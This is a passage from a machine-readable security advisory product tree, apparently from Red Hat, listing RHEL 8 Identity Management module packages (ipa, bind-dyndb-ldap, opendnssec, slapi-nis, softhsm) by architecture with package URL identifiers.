"purl": "pkg:rpm/redhat/python3-pyusb@1.0.0-9.1.module%2Bel8.9.0%2B18911%2B94941f82?arch=noarch\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "python3-qrcode-5.1-12.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"product": {
"name": "python3-qrcode-5.1-12.module+el8.9.0+18911+94941f82.noarch.rpm (idm:DL1)",
"product_id": "python3-qrcode-5.1-12.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-qrcode@5.1-12.module%2Bel8.9.0%2B18911%2B94941f82?arch=noarch\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "python3-qrcode-core-5.1-12.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"product": {
"name": "python3-qrcode-core-5.1-12.module+el8.9.0+18911+94941f82.noarch.rpm (idm:DL1)",
"product_id": "python3-qrcode-core-5.1-12.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-qrcode-core@5.1-12.module%2Bel8.9.0%2B18911%2B94941f82?arch=noarch\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "python3-yubico-1.3.2-9.1.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"product": {
"name": "python3-yubico-1.3.2-9.1.module+el8.9.0+18911+94941f82.noarch.rpm (idm:DL1)",
"product_id": "python3-yubico-1.3.2-9.1.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-yubico@1.3.2-9.1.module%2Bel8.9.0%2B18911%2B94941f82?arch=noarch\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
}
],
"category": "architecture",
"name": "noarch"
},
{
"branches": [
{
"category": "product_version",
"name": "ipa-client-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"product": {
"name": "ipa-client-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm (idm:client)",
"product_id": "ipa-client-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=s390x\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"product": {
"name": "ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm (idm:client)",
"product_id": "ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-debuginfo@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=s390x\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "ipa-client-epn-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"product": {
"name": "ipa-client-epn-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm (idm:client)",
"product_id": "ipa-client-epn-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-epn@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=s390x\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "ipa-client-samba-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"product": {
"name": "ipa-client-samba-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm (idm:client)",
"product_id": "ipa-client-samba-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-samba@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=s390x\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "ipa-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"product": {
"name": "ipa-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm (idm:client)",
"product_id": "ipa-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-debuginfo@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=s390x\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "ipa-debugsource-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"product": {
"name": "ipa-debugsource-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm (idm:client)",
"product_id": "ipa-debugsource-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-debugsource@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=s390x\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"product": {
"name": "bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.s390x.rpm (idm:DL1)",
"product_id": "bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/bind-dyndb-ldap@11.6-5.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=s390x\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "bind-dyndb-ldap-debuginfo-11.6-5.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"product": {
"name": "bind-dyndb-ldap-debuginfo-11.6-5.module+el8.10.0+21691+df63127d.s390x.rpm (idm:DL1)",
"product_id": "bind-dyndb-ldap-debuginfo-11.6-5.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/bind-dyndb-ldap-debuginfo@11.6-5.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=s390x\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "bind-dyndb-ldap-debugsource-11.6-5.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"product": {
"name": "bind-dyndb-ldap-debugsource-11.6-5.module+el8.10.0+21691+df63127d.s390x.rpm (idm:DL1)",
"product_id": "bind-dyndb-ldap-debugsource-11.6-5.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/bind-dyndb-ldap-debugsource@11.6-5.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=s390x\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-client-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"product": {
"name": "ipa-client-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm (idm:DL1)",
"product_id": "ipa-client-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=s390x\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"product": {
"name": "ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm (idm:DL1)",
"product_id": "ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-debuginfo@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=s390x\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-client-epn-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"product": {
"name": "ipa-client-epn-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm (idm:DL1)",
"product_id": "ipa-client-epn-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-epn@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=s390x\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-client-samba-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"product": {
"name": "ipa-client-samba-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm (idm:DL1)",
"product_id": "ipa-client-samba-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-samba@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=s390x\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"product": {
"name": "ipa-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm (idm:DL1)",
"product_id": "ipa-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-debuginfo@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=s390x\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-debugsource-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"product": {
"name": "ipa-debugsource-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm (idm:DL1)",
"product_id": "ipa-debugsource-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-debugsource@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=s390x\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-server-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"product": {
"name": "ipa-server-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm (idm:DL1)",
"product_id": "ipa-server-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-server@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=s390x\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-server-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"product": {
"name": "ipa-server-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm (idm:DL1)",
"product_id": "ipa-server-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-server-debuginfo@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=s390x\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-server-trust-ad-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"product": {
"name": "ipa-server-trust-ad-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm (idm:DL1)",
"product_id": "ipa-server-trust-ad-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-server-trust-ad@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=s390x\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-server-trust-ad-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"product": {
"name": "ipa-server-trust-ad-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm (idm:DL1)",
"product_id": "ipa-server-trust-ad-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-server-trust-ad-debuginfo@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=s390x\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"product": {
"name": "opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.s390x.rpm (idm:DL1)",
"product_id": "opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/opendnssec@2.1.7-1.module%2Bel8.9.0%2B18911%2B94941f82?arch=s390x\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "opendnssec-debuginfo-2.1.7-1.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"product": {
"name": "opendnssec-debuginfo-2.1.7-1.module+el8.9.0+18911+94941f82.s390x.rpm (idm:DL1)",
"product_id": "opendnssec-debuginfo-2.1.7-1.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/opendnssec-debuginfo@2.1.7-1.module%2Bel8.9.0%2B18911%2B94941f82?arch=s390x\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "opendnssec-debugsource-2.1.7-1.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"product": {
"name": "opendnssec-debugsource-2.1.7-1.module+el8.9.0+18911+94941f82.s390x.rpm (idm:DL1)",
"product_id": "opendnssec-debugsource-2.1.7-1.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/opendnssec-debugsource@2.1.7-1.module%2Bel8.9.0%2B18911%2B94941f82?arch=s390x\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.s390x.rpm-idm:DL1",
"product": {
"name": "slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.s390x.rpm (idm:DL1)",
"product_id": "slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.s390x.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/slapi-nis@0.60.0-4.module%2Bel8.10.0%2B20723%2B03062ebd?arch=s390x\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "slapi-nis-debuginfo-0.60.0-4.module+el8.10.0+20723+03062ebd.s390x.rpm-idm:DL1",
"product": {
"name": "slapi-nis-debuginfo-0.60.0-4.module+el8.10.0+20723+03062ebd.s390x.rpm (idm:DL1)",
"product_id": "slapi-nis-debuginfo-0.60.0-4.module+el8.10.0+20723+03062ebd.s390x.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/slapi-nis-debuginfo@0.60.0-4.module%2Bel8.10.0%2B20723%2B03062ebd?arch=s390x\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "slapi-nis-debugsource-0.60.0-4.module+el8.10.0+20723+03062ebd.s390x.rpm-idm:DL1",
"product": {
"name": "slapi-nis-debugsource-0.60.0-4.module+el8.10.0+20723+03062ebd.s390x.rpm (idm:DL1)",
"product_id": "slapi-nis-debugsource-0.60.0-4.module+el8.10.0+20723+03062ebd.s390x.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/slapi-nis-debugsource@0.60.0-4.module%2Bel8.10.0%2B20723%2B03062ebd?arch=s390x\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"product": {
"name": "softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.s390x.rpm (idm:DL1)",
"product_id": "softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/softhsm@2.6.0-5.module%2Bel8.9.0%2B18911%2B94941f82?arch=s390x\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "softhsm-debuginfo-2.6.0-5.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"product": {
"name": "softhsm-debuginfo-2.6.0-5.module+el8.9.0+18911+94941f82.s390x.rpm (idm:DL1)",
"product_id": "softhsm-debuginfo-2.6.0-5.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/softhsm-debuginfo@2.6.0-5.module%2Bel8.9.0%2B18911%2B94941f82?arch=s390x\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "softhsm-debugsource-2.6.0-5.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"product": {
"name": "softhsm-debugsource-2.6.0-5.module+el8.9.0+18911+94941f82.s390x.rpm (idm:DL1)",
"product_id": "softhsm-debugsource-2.6.0-5.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/softhsm-debugsource@2.6.0-5.module%2Bel8.9.0%2B18911%2B94941f82?arch=s390x\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "softhsm-devel-2.6.0-5.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"product": {
"name": "softhsm-devel-2.6.0-5.module+el8.9.0+18911+94941f82.s390x.rpm (idm:DL1)",
"product_id": "softhsm-devel-2.6.0-5.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/softhsm-devel@2.6.0-5.module%2Bel8.9.0%2B18911%2B94941f82?arch=s390x\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "ipa-client-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"product": {
"name": "ipa-client-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm (idm:client)",
"product_id": "ipa-client-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=ppc64le\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"product": {
"name": "ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm (idm:client)",
"product_id": "ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-debuginfo@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=ppc64le\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "ipa-client-epn-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"product": {
"name": "ipa-client-epn-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm (idm:client)",
"product_id": "ipa-client-epn-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-epn@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=ppc64le\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "ipa-client-samba-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"product": {
"name": "ipa-client-samba-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm (idm:client)",
"product_id": "ipa-client-samba-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-samba@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=ppc64le\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "ipa-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"product": {
"name": "ipa-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm (idm:client)",
"product_id": "ipa-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-debuginfo@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=ppc64le\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "ipa-debugsource-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"product": {
"name": "ipa-debugsource-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm (idm:client)",
"product_id": "ipa-debugsource-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-debugsource@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=ppc64le\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"product": {
"name": "bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.ppc64le.rpm (idm:DL1)",
"product_id": "bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/bind-dyndb-ldap@11.6-5.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=ppc64le\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "bind-dyndb-ldap-debuginfo-11.6-5.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"product": {
"name": "bind-dyndb-ldap-debuginfo-11.6-5.module+el8.10.0+21691+df63127d.ppc64le.rpm (idm:DL1)",
"product_id": "bind-dyndb-ldap-debuginfo-11.6-5.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/bind-dyndb-ldap-debuginfo@11.6-5.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=ppc64le\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "bind-dyndb-ldap-debugsource-11.6-5.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"product": {
"name": "bind-dyndb-ldap-debugsource-11.6-5.module+el8.10.0+21691+df63127d.ppc64le.rpm (idm:DL1)",
"product_id": "bind-dyndb-ldap-debugsource-11.6-5.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/bind-dyndb-ldap-debugsource@11.6-5.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=ppc64le\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-client-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"product": {
"name": "ipa-client-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm (idm:DL1)",
"product_id": "ipa-client-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=ppc64le\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"product": {
"name": "ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm (idm:DL1)",
"product_id": "ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-debuginfo@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=ppc64le\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-client-epn-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"product": {
"name": "ipa-client-epn-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm (idm:DL1)",
"product_id": "ipa-client-epn-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-epn@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=ppc64le\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-client-samba-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"product": {
"name": "ipa-client-samba-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm (idm:DL1)",
"product_id": "ipa-client-samba-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-samba@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=ppc64le\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"product": {
"name": "ipa-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm (idm:DL1)",
"product_id": "ipa-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-debuginfo@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=ppc64le\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-debugsource-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"product": {
"name": "ipa-debugsource-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm (idm:DL1)",
"product_id": "ipa-debugsource-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-debugsource@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=ppc64le\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-server-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"product": {
"name": "ipa-server-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm (idm:DL1)",
"product_id": "ipa-server-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-server@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=ppc64le\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-server-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"product": {
"name": "ipa-server-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm (idm:DL1)",
"product_id": "ipa-server-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-server-debuginfo@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=ppc64le\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-server-trust-ad-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"product": {
